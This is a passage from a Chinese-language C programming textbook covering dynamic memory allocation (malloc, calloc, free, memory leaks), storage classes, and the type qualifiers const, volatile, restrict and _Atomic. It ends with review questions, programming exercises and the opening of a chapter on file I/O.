= (double *) malloc(max * sizeof (double)); 在C中,不一定要使用强制类型转换(double *),但是在C++中必须使 用。所以,使用强制类型转换更容易把C程序转换为C++程序。 malloc()可能分配不到所需的内存。在这种情况下,该函数返回空指 针,程序结束: if (ptd == NULL) { puts("Memory allocation failed. Goodbye."); 915 exit(EXIT_FAILURE); } 如果程序成功分配内存,便可把ptd视为一个有max个元素的数组名。 注意,free()函数位于程序的末尾,它释放了malloc()函数分配的内存。 free()函数只释放其参数指向的内存块。一些操作系统在程序结束时会自动 释放动态分配的内存,但是有些系统不会。为保险起见,请使用free(),不 要依赖操作系统来清理。 使用动态数组有什么好处?从本例来看,使用动态数组给程序带来了更 多灵活性。假设你已经知道,在大多数情况下程序所用的数组都不会超过 100个元素,但是有时程序确实需要10000个元素。要是按照平时的做法,你 不得不为这种情况声明一个内含 10000 个元素的数组。基本上这样做是在浪 费内存。如果需要10001个元素,该程序就会出错。这种情况下,可以使用 一个动态数组调整程序以适应不同的情况。 12.4.1 free()的重要性 静态内存的数量在编译时是固定的,在程序运行期间也不会改变。自动 变量使用的内存数量在程序执行期间自动增加或减少。但是动态分配的内存 数量只会增加,除非用 free()进行释放。例如,假设有一个创建数组临时副 本的函数,其代码框架如下: ... int main() { double glad[2000]; int i; 916 ... for (i = 0; i < 1000; i++) gobble(glad, 2000); ... } void gobble(double ar[], int n) { double * temp = (double *) malloc( n * sizeof(double)); .../* free(temp); // 假设忘记使用free() */ } 第1次调用gobble()时,它创建了指针temp,并调用malloc()分配了16000 字节的内存(假设double为8 字节)。假设如代码注释所示,遗漏了free()。 当函数结束时,作为自动变量的指针temp也会消失。但是它所指向的16000 字节的内存却仍然存在。由于temp指针已被销毁,所以无法访问这块内存, 它也不能被重复使用,因为代码中没有调用free()释放这块内存。 第2次调用gobble()时,它又创建了指针temp,并调用malloc()分配了 16000字节的内存。第1次分配的16000字节内存已不可用,所以malloc()分配 了另外一块16000字节的内存。当函数结束时,该内存块也无法被再访问和 再使用。 循环要执行1000次,所以在循环结束时,内存池中有1600万字节被占 用。实际上,也许在循环结束之前就已耗尽所有的内存。这类问题被称为内 存泄漏(memory leak)。在函数末尾处调用free()函数可避免这类问题发 生。 917 12.4.2 calloc()函数 分配内存还可以使用calloc(),典型的用法如下: long * newmem; newmem = (long *)calloc(100, sizeof (long)); 和malloc()类似,在ANSI之前,calloc()也返回指向char的指针;在ANSI 之后,返回指向void的指针。如果要储存不同的类型,应使用强制类型转换 运算符。calloc()函数接受两个无符号整数作为参数(ANSI规定是size_t类 型)。第1个参数是所需的存储单元数量,第2个参数是存储单元的大小(以 字节为单位)。在该例中,long为4字节,所以,前面的代码创建了100个4 字节的存储单元,总共400字节。 用sizeof(long)而不是4,提高了代码的可移植性。这样,在其他long不是 4字节的系统中也能正常工作。 calloc()函数还有一个特性:它把块中的所有位都设置为0(注意,在某 些硬件系统中,不是把所有位都设置为0来表示浮点值0)。 free()函数也可用于释放calloc()分配的内存。 动态内存分配是许多高级程序设计技巧的关键。我们将在第17章中详细 讲解。有些编译器可能还提供其他内存管理函数,有些可以移植,有些不可 以。读者可以抽时间看一下。 12.4.3 动态内存分配和变长数组 变长数组(VLA)和调用 malloc()在功能上有些重合。例如,两者都可 用于创建在运行时确定大小的数组: int vlamal() { 918 int n; int * pi; scanf("%d", &n); pi = (int *) malloc (n * sizeof(int)); int ar[n];// 变长数组 pi[2] = ar[2] = -5; ... } 不同的是,变长数组是自动存储类型。因此,程序在离开变长数组定义 所在的块时(该例中,即vlamal()函数结束时),变长数组占用的内存空间 会被自动释放,不必使用 free()。另一方面,用malloc()创建的数组不必局限 在一个函数内访问。例如,可以这样做:被调函数创建一个数组并返回指 针,供主调函数访问,然后主调函数在末尾调用free()释放之前被调函数分 配的内存。另外,free()所用的指针变量可以与 malloc()的指针变量不同,但 是两个指针必须储存相同的地址。但是,不能释放同一块内存两次。 对多维数组而言,使用变长数组更方便。当然,也可以用 malloc()创建 二维数组,但是语法比较繁琐。如果编译器不支持变长数组特性,就只能固 定二维数组的维度,如下所示: int n = 5; int m = 6; int ar2[n][m]; // n×m的变长数组(VLA) int (* p2)[6]; // C99之前的写法 919 int (* p3)[m]; // 要求支持变长数组 p2 = (int (*)[6]) malloc(n * 6 * sizeof(int)); // n×6 数组 p3 = (int (*)[m]) malloc(n * m * sizeof(int)); // n×m 数组(要求支持变长数 组) ar2[1][2] = p2[1][2] = 12; 先复习一下指针声明。由于malloc()函数返回一个指针,所以p2必须是 一个指向合适类型的指针。第1个指针声明: int (* p2)[6]; // C99之前的写法 表明p2指向一个内含6个int类型值的数组。因此,p2[i]代表一个由6个整 数构成的元素,p2[i][j]代表一个整数。 第2个指针声明用一个变量指定p3所指向数组的大小。因此,p3代表一 个指向变长数组的指针,这行代码不能在C90标准中运行。 12.4.4 存储类别和动态内存分配 存储类别和动态内存分配有何联系?我们来看一个理想化模型。可以认 为程序把它可用的内存分为 3部分:一部分供具有外部链接、内部链接和无 链接的静态变量使用;一部分供自动变量使用;一部分供动态内存分配。 静态存储类别所用的内存数量在编译时确定,只要程序还在运行,就可 访问储存在该部分的数据。该类别的变量在程序开始执行时被创建,在程序 结束时被销毁。 然而,自动存储类别的变量在程序进入变量定义所在块时存在,在程序 离开块时消失。因此,随着程序调用函数和函数结束,自动变量所用的内存 数量也相应地增加和减少。这部分的内存通常作为栈来处理,这意味着新创 建的变量按顺序加入内存,然后以相反的顺序销毁。 920 动态分配的内存在调用 malloc()或相关函数时存在,在调用 free()后释 放。这部分的内存由程序员管理,而不是一套规则。所以内存块可以在一个 函数中创建,在另一个函数中销毁。正是因为这样,这部分的内存用于动态 内存分配会支离破碎。也就是说,未使用的内存块分散在已使用的内存块之 间。另外,使用动态内存通常比使用栈内存慢。 总而言之,程序把静态对象、自动对象和动态分配的对象储存在不同的 区域。 程序清单12.15 where.c程序 // where.c -- 数据被储存在何处? #include <stdio.h> #include <stdlib.h> #include <string.h> int static_store = 30; const char * pcg = "String Literal"; int main() { int auto_store = 40; char auto_string [] = "Auto char Array"; int * pi; char * pcl; pi = (int *) malloc(sizeof(int)); 921 *pi = 35; pcl = (char *) malloc(strlen("Dynamic String") + 1); strcpy(pcl, "Dynamic String"); printf("static_store: %d at %p\n", static_store, &static_store); printf("  auto_store: %d at %p\n", auto_store, &auto_store); printf("    *pi: %d at %p\n", *pi, pi); printf("  %s at %p\n", pcg, pcg); printf(" %s at %p\n", auto_string, auto_string); printf("  %s at %p\n", pcl, pcl); printf("  %s at %p\n", "Quoted String", "Quoted String"); free(pi); free(pcl); return 0; } 在我们的系统中,该程序的输入如下: static_store: 30 at 00378000 auto_store: 40 at 0049FB8C *pi: 35 at 008E9BA0 String Literal at 00375858 922 Auto char Array at 0049FB74 Dynamic String at 008E9BD0 Quoted String at 00375908 如上所示,静态数据(包括字符串字面量)占用一个区域,自动数据占 用另一个区域,动态分配的数据占用第3个区域(通常被称为内存堆或自由 内存)。 923 12.5 ANSI C类型限定符 我们通常用类型和存储类别来描述一个变量。C90 还新增了两个属性: 恒常性(constancy)和易变性(volatility)。这两个属性可以分别用关键字 const 和 volatile 来声明,以这两个关键字创建的类型是限定类型(qualified type)。C99标准新增了第3个限定符:restrict,用于提高编译器优化。C11 标准新增了第4个限定符:_Atomic。C11提供一个可选库,由stdatomic.h管 理,以支持并发程序设计,而且_Atomic是可选支持项。 C99 为类型限定符增加了一个新属性:它们现在是幂等的 (idempotent)!这个属性听起来很强大,其实意思是可以在一条声明中多 次使用同一个限定符,多余的限定符将被忽略: const const const int n = 6; // 与 const int n = 6;相同 有了这个新属性,就可以编写类似下面的代码: typedef const int zip; const zip q = 8; 12.5.1 const类型限定符 第4章和第10章中介绍过const。以const关键字声明的对象,其值不能通 过赋值或递增、递减来修改。在ANSI兼容的编译器中,以下代码: const int nochange;  /* 限定nochange的值不能被修改 */ nochange = 12;    /* 不允许 */ 编译器会报错。但是,可以初始化const变量。因此,下面的代码没问 题: const int nochange = 12; /* 没问题 */ 924 该声明让nochange成为只读变量。初始化后,就不能再改变它的值。 可以用const关键字创建不允许修改的数组: const int days1[12] = {31,28,31,30,31,30,31,31,30,31,30,31}; 1.在指针和形参声明中使用const 声明普通变量和数组时使用 const 关键字很简单。指针则复杂一些,因 为要区分是限定指针本身为const还是限定指针指向的值为const。下面的声 明: const float * pf; /* pf 指向一个float类型的const值 */ 创建了 pf 指向的值不能被改变,而 pt 本身的值可以改变。例如,可以 设置该指针指向其他 const值。相比之下,下面的声明: float * const pt; /* pt 是一个const指针 */ 创建的指针pt本身的值不能更改。pt必须指向同一个地址,但是它所指 向的值可以改变。下面的声明: const float * const ptr; 表明ptr既不能指向别处,它所指向的值也不能改变。 还可以把const放在第3个位置: float const * pfc; // 与const float * pfc;相同 如注释所示,把const放在类型名之后、*之前,说明该指针不能用于改 变它所指向的值。简而言之, const放在*左侧任意位置,限定了指针指向的 数据不能改变;const放在*的右侧,限定了指针本身不能改变。 const 关键字的常见用法是声明为函数形参的指针。例如,假设有一个 函数要调用 display()显示一个数组的内容。要把数组名作为实际参数传递给 925 该函数,但是数组名是一个地址。该函数可能会更改主调函数中的数据,但 是下面的原型保证了数据不会被更改: void display(const int array[], int limit); 在函数原型和函数头,形参声明const int array[]与const int * array相同, 所以该声明表明不能更改array指向的数据。 ANSI C库遵循这种做法。如果一个指针仅用于给函数访问值,应将其 声明为一个指向const限定类型的指针。如果要用指针更改主调函数中的数 据,就不使用const关键字。例如,ANSI C中的strcat()原型如下: char *strcat(char * restrict s1, const char * restrict s2); 回忆一下,strcat()函数在第1个字符串的末尾添加第2个字符串的副本。 这更改了第1个字符串,但是未更改第1个字符串。上面的声明体现了这一 点。 2.对全局数据使用const 前面讲过,使用全局变量是一种冒险的方法,因为这样做暴露了数据, 程序的任何部分都能更改数据。如果把数据设置为 const,就可避免这样的 危险,因此用 const 限定符声明全局数据很合理。可以创建const变量、const 数组和const结构(结构是一种复合数据类型,将在下一章介绍)。 然而,在文件间共享const数据要小心。可以采用两个策略。第一,遵 循外部变量的常用规则,即在一个文件中使用定义式声明,在其他文件中使 用引用式声明(用extern关键字): /* file1.c -- 定义了一些外部const变量 */ const double PI = 3.14159; const char * MONTHS[12] = { "January", "February", "March", "April", "May", 926 "June", "July","August", "September", "October", "November", "December" }; /* file2.c -- 使用定义在别处的外部const变量 */ extern const double PI; extern const * MONTHS []; 另一种方案是,把const变量放在一个头文件中,然后在其他文件中包 含该头文件: /* constant.h --定义了一些外部const变量*/ static const double PI = 3.14159; static const char * MONTHS[12] ={"January", "February", "March", "April", "May", "June", "July","August", "September", "October", "November", "December"}; /* file1.c --使用定义在别处的外部const变量*/ #include "constant.h" /* file2.c --使用定义在别处的外部const变量*/ #include "constant.h" 这种方案必须在头文件中用关键字static声明全局const变量。如果去掉 static,那么在file1.c和file2.c中包含constant.h将导致每个文件中都有一个相 同标识符的定义式声明,C标准不允许这样做(然而,有些编译器允许)。 实际上,这种方案相当于给每个文件提供了一个单独的数据副本[1]。由于 927 每个副本只对该文件可见,所以无法用这些数据和其他文件通信。不过没关 系,它们都是完全相同(每个文件都包含相同的头文件)的const数据(声 明时使用了const关键字),这不是问题。 头文件方案的好处是,方便你偷懒,不用惦记着在一个文件中使用定义 式声明,在其他文件中使用引用式声明。所有的文件都只需包含同一个头文 件即可。但它的缺点是,数据是重复的。对于前面的例子而言,这不算什么 问题,但是如果const数据包含庞大的数组,就不能视而不见了。 12.5.2 volatile类型限定符 volatile 限定符告知计算机,代理(而不是变量所在的程序)可以改变 该变量的值。通常,它被用于硬件地址以及在其他程序或同时运行的线程中 共享数据。例如,一个地址上可能储存着当前的时钟时间,无论程序做什 么,地址上的值都随时间的变化而改变。或者一个地址用于接受另一台计算 机传入的信息。 volatile的语法和const一样: olatile int loc1;/* loc1 是一个易变的位置 */ volatile int * ploc;  /* ploc 是一个指向易变的位置的指针 */ 以上代码把loc1声明为volatile变量,把ploc声明为指向volatile变量的指 针。 读者可能认为volatile是个可有可无的概念,为何ANSI委员把volatile关 键字放入标准?原因是它涉及编译器的优化。例如,假设有下面的代码: vall =x; /* 一些不使用 x 的代码*/ val2 = x 928 智能的(进行优化的)编译器会注意到以上代码使用了两次 x,但并未 改变它的值。于是编译器把 x的值临时储存在寄存器中,然后在val2需要使 用x时,才从寄存器中(而不是从原始内存位置上)读取x的值,以节约时 间。这个过程被称为高速缓存(caching)。通常,高速缓存是个不错的优化 方案,但是如果一些其他代理在以上两条语句之间改变了x的值,就不能这 样优化了。如果没有volatile关键字,编译器就不知道这种事情是否会发 生。因此,为安全起见,编译器不会进行高速缓存。这是在 ANSI 之前的情 况。现在,如果声明中没有volatile关键字,编译器会假定变量的值在使用 过程中不变,然后再尝试优化代码。 可以同时用const和volatile限定一个值。例如,通常用const把硬件时钟 设置为程序不能更改的变量,但是可以通过代理改变,这时用 volatile。只 能在声明中同时使用这两个限定符,它们的顺序不重要,如下所示: volatile const int loc; const volatile int * ploc; 12.5.3 restrict类型限定符 restrict 关键字允许编译器优化某部分代码以更好地支持计算。它只能 用于指针,表明该指针是访问数据对象的唯一且初始的方式。要弄明白为什 么这样做有用,先看几个例子。考虑下面的代码: int ar[10]; int * restrict restar = (int *) malloc(10 * sizeof(int)); int * par = ar; 这里,指针restar是访问由malloc()所分配内存的唯一且初始的方式。因 此,可以用restrict关键字限定它。而指针par既不是访问ar数组中数据的初始 方式,也不是唯一方式。所以不用把它设置为restrict。 929 现在考虑下面稍复杂的例子,其中n是int类型: for (n = 0; n < 10; n++) { par[n] += 5; restar[n] += 5; ar[n] *= 2; par[n] += 3; restar[n] += 3; } 由于之前声明了 restar 是访问它所指向的数据块的唯一且初始的方式, 编译器可以把涉及 restar的两条语句替换成下面这条语句,效果相同: restar[n] += 8; /* 可以进行替换 */ 但是,如果把与par相关的两条语句替换成下面的语句,将导致计算错 误: par[n] += 8; / * 给出错误的结果 */ 这是因为for循环在par两次访问相同的数据之间,用ar改变了该数据的 值。 在本例中,如果未使用restrict关键字,编译器就必须假设最坏的情况 (即,在两次使用指针之间,其他的标识符可能已经改变了数据)。如果用 了restrict关键字,编译器就可以选择捷径优化计算。 restrict 限定符还可用于函数形参中的指针。这意味着编译器可以假定 930 在函数体内其他标识符不会修改该指针指向的数据,而且编译器可以尝试对 其优化,使其不做别的用途。例如,C 库有两个函数用于把一个位置上的字 节拷贝到另一个位置。在C99中,这两个函数的原型是: void * memcpy(void * restrict s1, const void * restrict s2, size_t n); void * memmove(void * s1, const void * s2, size_t n); 这两个函数都从位置s2把n字节拷贝到位置s1。memcpy()函数要求两个 位置不重叠,但是memove()没有这样的要求。声明s1和s2为restrict说明这两 个指针都是访问相应数据的唯一方式,所以它们不能访问相同块的数据。这 满足了memcpy()无重叠的要求。memmove()函数允许重叠,它在拷贝数据时 不得不更小心,以防在使用数据之前就先覆盖了数据。 restrict 关键字有两个读者。一个是编译器,该关键字告知编译器可以 自由假定一些优化方案。另一个读者是用户,该关键字告知用户要使用满足 restrict要求的参数。总而言之,编译器不会检查用户是否遵循这一限制,但 是无视它后果自负。 12.5.4 _Atomic类型限定符(C11) 并发程序设计把程序执行分成可以同时执行的多个线程。这给程序设计 带来了新的挑战,包括如何管理访问相同数据的不同线程。C11通过包含可 选的头文件stdatomic.h和threads.h,提供了一些可选的(不是必须实现的) 管理方法。值得注意的是,要通过各种宏函数来访问原子类型。当一个线程 对一个原子类型的对象执行原子操作时,其他线程不能访问该对象。例如, 下面的代码: int hogs;// 普通声明 hogs = 12;  // 普通赋值 可以替换成: 931 _Atomic int hogs;      // hogs 是一个原子类型的变量 atomic_store(&hogs, 12);  // stdatomic.h中的宏 这里,在hogs中储存12是一个原子过程,其他线程不能访问hogs。 编写这种代码的前提是,编译器要支持这一新特性。 12.5.5 旧关键字的新位置 C99允许把类型限定符和存储类别说明符static放在函数原型和函数头的 形式参数的初始方括号中。对于类型限定符而言,这样做为现有功能提供了 一个替代的语法。例如,下面是旧式语法的声明: void ofmouth(int * const a1, int * restrict a2, int n); // 以前的风格 该声明表明a1是一个指向int的const指针,这意味着不能更改指针本身, 可以更改指针指向的数据。除此之外,还表明a2是一个restrict指针,如上一 节所述。新的等价语法如下: void ofmouth(int a1[const], int a2[restrict], int n); // C99允许 根据新标准,在声明函数形参时,指针表示法和数组表示法都可以使用 这两个限定符。 static的情况不同,因为新标准为static引入了一种与以前用法不相关的 新用法。现在,static除了表明静态存储类别变量的作用域或链接外,新的 用法告知编译器如何使用形式参数。例如,考虑下面的原型: double stick(double ar[static 20]); static 的这种用法表明,函数调用中的实际参数应该是一个指向数组首 元素的指针,且该数组至少有20个元素。这种用法的目的是让编译器使用这 些信息优化函数的编码。为何给static新增一个完全不同的用法?C 标准委员 会不愿意创建新的关键字,因为这样会让以前用新关键字作为标识符的程序 932 无效。所以,他们会尽量利用现有的关键字,尽量不添加新的关键字。 restrict 关键字有两个读者。一个是编译器,该关键字告知编译器可以 自由假定一些优化方案。另一个读者是用户,该关键字告知用户要使用满足 restrict要求的参数。 933 12.6 关键概念 C 提供多种管理内存的模型。除了熟悉这些模型外,还要学会如何选择 不同的类别。大多数情况下,最好选择自动变量。如果要使用其他类别,应 该有充分的理由。通常,使用自动变量、函数形参和返回值进行函数间的通 信比使用全局变量安全。但是,保持不变的数据适合用全局变量。 应该尽量理解静态内存、自动内存和动态分配内存的属性。尤其要注 意:静态内存的数量在编译时确定;静态数据在载入程序时被载入内存。在 程序运行时,自动变量被分配或释放,所以自动变量占用的内存数量随着程 序的运行会不断变化。可以把自动内存看作是可重复利用的工作区。动态分 配的内存也会增加和减少,但是这个过程由函数调用控制,不是自动进行 的。 934 12.7 本章小结 内存用于存储程序中的数据,由存储期、作用域和链接表征。存储期可 以是静态的、自动的或动态分配的。如果是静态存储期,在程序开始执行时 分配内存,并在程序运行时都存在。如果是自动存储期,在程序进入变量定 义所在块时分配变量的内存,在程序离开块时释放内存。如果是动态分配存 储期,在调用malloc()(或相关函数)时分配内存,在调用free()函数时释放 内存。 作用域决定程序的哪些部分可以访问某数据。定义在所有函数之外的变 量具有文件作用域,对位于该变量声明之后的所有函数可见。定义在块或作 为函数形参内的变量具有块作用域,只对该块以及它包含的嵌套块可见。 链接描述定义在程序某翻译单元中的变量可被链接的程度。具有块作用 域的变量是局部变量,无链接。具有文件作用域的变量可以是内部链接或外 部链接。内部链接意味着只有其定义所在的文件才能使用该变量。外部链接 意味着其他文件使用也可以使用该变量。 下面是C的5种存储类别(不包括线程的概念)。 自动——在块中不带存储类别说明符或带 auto 存储类别说明符声明的 变量(或作为函数头中的形参)属于自动存储类别,具有自动存储期、块作 用域、无链接。如果未初始化自动变量,它的值是未定义的。 寄存器——在块中带 register 存储类别说明符声明的变量(或作为函数 头中的形参)属于寄存器存储类别,具有自动存储期、块作用域、无链接, 且无法获取其地址。把一个变量声明为寄存器变量即请求编译器将其储存到 访问速度最快的区域。如果未初始化寄存器变量,它的值是未定义的。 静态、无链接——在块中带static存储类别说明符声明的变量属于“静 态、无链接”存储类别,具有静态存储期、块作用域、无链接。只在编译时 被初始化一次。如果未显式初始化,它的字节都被设置为0。 935 静态、外部链接——在所有函数外部且没有使用 static 存储类别说明符 声明的变量属于“静态、外部链接”存储类别,具有静态存储期、文件作用 域、外部链接。只能在编译器被初始化一次。如果未显式初始化,它的字节 都被设置为0。 静态、内部链接——在所有函数外部且使用了 static 存储类别说明符声 明的变量属于“静态、内部链接”存储类别,具有静态存储期、文件作用域、 内部链接。只能在编译器被初始化一次。如果未显式初始化,它的字节都被 设置为0。 动态分配的内存由 malloc()(或相关)函数分配,该函数返回一个指向 指定字节数内存块的指针。这块内存被free()函数释放后便可重复使用, free()函数以该内存块的地址作为参数。 类型限定符const、volatile、restrict和_Atomic。const限定符限定数据在 程序运行时不能改变。对指针使用const时,可限定指针本身不能改变或指 针指向的数据不能改变,这取决于const在指针声明中的位置。volatile 限定 符表明,限定的数据除了被当前程序修改外还可以被其他进程修改。该限定 符的目的是警告编译器不要进行假定的优化。restrict限定符也是为了方便编 译器设置优化方案。restrict限定的指针是访问它所指向数据的唯一途径。 936 12.8 复习题 复习题的参考答案在附录A中。 1.哪些类别的变量可以成为它所在函数的局部变量? 2.哪些类别的变量在它所在程序的运行期一直存在? 3.哪些类别的变量可以被多个文件使用?哪些类别的变量仅限于在一个 文件中使用? 4.块作用域变量具有什么链接属性? 5.extern关键字有什么用途? 6.考虑下面两行代码,就输出的结果而言有何异同: int * p1 = (int *)malloc(100 * sizeof(int)); int * p1 = (int *)calloc(100, sizeof(int)); 7.下面的变量对哪些函数可见?程序是否有误? /* 文件 1 */ int daisy; int main(void) { int lily; ...; } 937 int petal() { extern int daisy, lily; ...; } /* 文件 2 */ extern int daisy; static int lily; int rose; int stem() { int rose; ...; } void root() { ...; } 8.下面程序会打印什么? 938 #include <stdio.h> char color = 'B'; void first(void); void second(void); int main(void) { extern char color; printf("color in main() is %c\n", color); first(); printf("color in main() is %c\n", color); second(); printf("color in main() is %c\n", color); return 0; } void first(void) { char color; color = 'R'; printf("color in first() is %c\n", color); 939 } void second(void) { color = 'G'; printf("color in second() is %c\n", color); } 9.假设文件的开始处有如下声明: static int plink; int value_ct(const int arr[], int value, int n); a.以上声明表明了程序员的什么意图? b.用const int value和const int n分别替换int value和int n,是否对主调程序 的值加强保护。 940 12.9 编程练习 1.不使用全局变量,重写程序清单12.4。 2.在美国,通常以英里/加仑来计算油耗;在欧洲,以升/100 公里来计 算。下面是程序的一部分,提示用户选择计算模式(美制或公制),然后接 收数据并计算油耗。 // pe12-2b.c // 与 pe12-2a.c 一起编译 #include <stdio.h> #include "pe12-2a.h" int main(void) { int mode; printf("Enter 0 for metric mode, 1 for US mode: "); scanf("%d", &mode); while (mode >= 0) { set_mode(mode); get_info(); show_info(); 941 printf("Enter 0 for metric mode, 1 for US mode"); printf(" (-1 to quit): "); scanf("%d", &mode); } printf("Done.\n"); return 0; } 下面是是一些输出示例: Enter 0 for metric mode, 1 for US mode: 0 Enter distance traveled in kilometers: 600 Enter fuel consumed in liters: 78.8 Fuel consumption is 13.13 liters per 100 km. Enter 0 for metric mode, 1 for US mode (-1 to quit): 1 Enter distance traveled in miles: 434 Enter fuel consumed in gallons: 12.7 Fuel consumption is 34.2 miles per gallon. Enter 0 for metric mode, 1 for US mode (-1 to quit): 3 Invalid mode specified. Mode 1(US) used. Enter distance traveled in miles: 388 942 Enter fuel consumed in gallons: 15.3 Fuel consumption is 25.4 miles per gallon. Enter 0 for metric mode, 1 for US mode (-1 to quit): -1 Done. 如果用户输入了不正确的模式,程序向用户给出提示消息并使用上一次 输入的正确模式。请提供pe12-2a.h头文件和pe12-2a.c源文件。源代码文件应 定义3个具有文件作用域、内部链接的变量。一个表示模式、一个表示距 离、一个表示消耗的燃料。get_info()函数根据用户输入的模式提示用户输入 相应数据,并将其储存到文件作用域变量中。show_info()函数根据设置的模 式计算并显示油耗。可以假设用户输入的都是数值数据。 3.重新设计编程练习2,要求只使用自动变量。该程序提供的用户界面 不变,即提示用户输入模式等。但是,函数调用要作相应变化。 4.在一个循环中编写并测试一个函数,该函数返回它被调用的次数。 5.编写一个程序,生成100个1~10范围内的随机数,并以降序排列(可 以把第11章的排序算法稍加改动,便可用于整数排序,这里仅对整数排 序)。 6.编写一个程序,生成1000个1~10范围内的随机数。不用保存或打印 这些数字,仅打印每个数出现的次数。用 10 个不同的种子值运行,生成的 数字出现的次数是否相同?可以使用本章自定义的函数或ANSI C的rand()和 srand()函数,它们的格式相同。这是一个测试特定随机数生成器随机性的方 法。 7.编写一个程序,按照程序清单12.13输出示例后面讨论的内容,修改该 程序。使其输出类似: Enter the number of sets; enter q to stop : 18 943 How many sides and how many dice? 6 3 Here are 18 sets of 3 6-sided throws. 12 10 6 9 8 14 8 15 9 14 12 17 11 7 10 13 8 14 How many sets? Enter q to stop: q 8.下面是程序的一部分: // pe12-8.c #include <stdio.h> int * make_array(int elem, int val); void show_array(const int ar [], int n); int main(void) { int * pa; int size; int value; printf("Enter the number of elements: "); while (scanf("%d", &size) == 1 && size > 0) { printf("Enter the initialization value: "); 944 scanf("%d", &value); pa = make_array(size, value); if (pa) { show_array(pa, size); free(pa); } printf("Enter the number of elements (<1 to quit): "); } printf("Done.\n"); return 0; } 提供make_array()和show_array()函数的定义,完成该程序。make_array() 函数接受两个参数,第1个参数是int类型数组的元素个数,第2个参数是要赋 给每个元素的值。该函数调用malloc()创建一个大小合适的数组,将其每个 元素设置为指定的值,并返回一个指向该数组的指针。show_array()函数显 示数组的内容,一行显示8个数。 9.编写一个符合以下描述的函数。首先,询问用户需要输入多少个单 词。然后,接收用户输入的单词,并显示出来,使用malloc()并回答第1个问 题(即要输入多少个单词),创建一个动态数组,该数组内含相应的指向 char的指针(注意,由于数组的每个元素都是指向char的指针,所以用于储 存malloc()返回值的指针应该是一个指向指针的指针,且它所指向的指针指 945 向char)。在读取字符串时,该程序应该把单词读入一个临时的char数组, 使用malloc()分配足够的存储空间来储存单词,并把地址存入该指针数组 (该数组中每个元素都是指向 char 的指针)。然后,从临时数组中把单词 拷贝到动态分配的存储空间中。因此,有一个字符指针数组,每个指针都指 向一个对象,该对象的大小正好能容纳被储存的特定单词。下面是该程序的 一个运行示例: How many words do you wish to enter? 5 Enter 5 words now: I enjoyed doing this exerise Here are your words: I enjoyed doing this exercise [1].注意,以static声明的文件作用域变量具有内部链接属性。——译者注 946 第13章 文件输入/输出 本章介绍以下内容: 函数:fopen()、getc()、putc()、exit()、fclose() fprintf()、fscanf()、fgets()、fputs() rewind()、fseek()、ftell()、fflush() fgetpos()、fsetpos()、feof()、ferror() ungetc()、setvbuf()、fread()、fwrite() 如何使用C标准I/O系列的函数处理文件 文件模式和二进制模式、文本和二进制格式、缓冲和无缓冲I/O 使用既可以顺序访问文件也可以随机访问文件的函数 文件是当今计算机系统不可或缺的部分。文件用于储存程序、文档、数 据、书信、表格、图形、照片、视频和许多其他种类的信息。作为程序员, 必须会编写创建文件和从文件读写数据的程序。本章将介绍相关的内容。 947 13.1 与文件进行通信 有时,需要程序从文件中读取信息或把信息写入文件。这种程序与文件 交互的形式就是文件重定向(第8章介绍过)。这种方法很简单,但是有一 定限制。例如,假设要编写一个交互程序,询问用户书名并把完整的书名列 表保存在文件中。如果使用重定向,应该类似于: books > bklist 用户的输入被重定向到 bklist 中。这样做不仅会把不符合要求的文本写 入 bklist,而且用户也看不到要回答什么问题。 C提供了更强大的文件通信方法,可以在程序中打开文件,然后使用特 殊的I/O函数读取文件中的信息或把信息写入文件。在研究这些方法之前, 先简要介绍一下文件的性质。 13.1.1 文件是什么 文件(file)通常是在磁盘或固态硬盘上的一段已命名的存储区。对我 们而言,stdio.h就是一个文件的名称,该文件中包含一些有用的信息。然 而,对操作系统而言,文件更复杂一些。例如,大型文件会被分开储存,或 者包含一些额外的数据,方便操作系统确定文件的种类。然而,这都是操作 系统所关心的,程序员关心的是C程序如何处理文件(除非你正在编写操作 系统)。 C把文件看作是一系列连续的字节,每个字节都能被单独读取。这与 UNIX环境中(C的发源地)的文件结构相对应。由于其他环境中可能无法完 全对应这个模型,C提供两种文件模式:文本模式和二进制模式。 13.1.2 文本模式和二进制模式 首先,要区分文本内容和二进制内容、文本文件格式和二进制文件格 式,以及文件的文本模式和二进制模式。 948 所有文件的内容都以二进制形式(0或1)储存。但是,如果文件最初使 用二进制编码的字符(例如, ASCII或Unicode)表示文本(就像C字符串那 样),该文件就是文本文件,其中包含文本内容。如果文件中的二进制值代 表机器语言代码或数值数据(使用相同的内部表示,假设,用于long或 double类型的值)或图片或音乐编码,该文件就是二进制文件,其中包含二 进制内容。 UNIX用同一种文件格式处理文本文件和二进制文件的内容。不奇怪, 鉴于C是作为开发UNIX的工具而创建的,C和UNIX在文本中都使用\n(换行 符)表示换行。UNIX目录中有一个统计文件大小的计数,程序可使用该计 数确定是否读到文件结尾。然而,其他系统在此之前已经有其他方法处理文 件,专门用于保存文本。也就是说,其他系统已经有一种与UNIX模型不同 的格式处理文本文件。例如,以前的OS X Macintosh文件用\r (回车符)表 示新的一行。早期的MS-DOS文件用\r\n组合表示新的一行,用嵌入的Ctrl+Z 字符表示文件结尾,即使实际文件用添加空字符的方法使其总大小是256的 倍数(在Windows中,Notepad仍然生成MS-DOS格式的文本文件,但是新的 编辑器可能使用类UNIX格式居多)。其他系统可能保持文本文件中的每一 行长度相同,如有必要,用空字符填充每一行,使其长度保持一致。或者, 系统可能在每行的开始标出每行的长度。 为了规范文本文件的处理,C 提供两种访问文件的途径:二进制模式和 文本模式。在二进制模式中,程序可以访问文件的每个字节。而在文本模式 中,程序所见的内容和文件的实际内容不同。程序以文本模式读取文件时, 把本地环境表示的行末尾或文件结尾映射为C模式。例如,C程序在旧式 Macintosh中以文本模式读取文件时,把文件中的\r转换成\n;以文本模式写 入文件时,把\n转换成\r。或者,C文本模式程序在MS-DOS平台读取文件 时,把\r\n转换成\n;写入文件时,把\n转换成\r\n。在其他环境中编写的文本 模式程序也会做类似的转换。 除了以文本模式读写文本文件,还能以二进制模式读写文本文件。如果 读写一个旧式MS-DOS文本文件,程序会看到文件中的\r 和\n 字符,不会发 生映射(图 13.1 演示了一些文本)。如果要编写旧式 Mac格式、MS-DOS格 949 式或UNIX/Linux格式的文件模式程序,应该使用二进制模式,这样程序才能 确定实际的文件内容并执行相应的动作。 图13.1 二进制模式和文本模式 虽然C提供了二进制模式和文本模式,但是这两种模式的实现可以相 同。前面提到过,因为UNIX使用一种文件格式,这两种模式对于UNIX实现 而言完全相同。Linux也是如此。 13.1.3 I/O的级别 除了选择文件的模式,大多数情况下,还可以选择I/O的两个级别(即 处理文件访问的两个级别)。底层I/O(low-level I/O)使用操作系统提供的 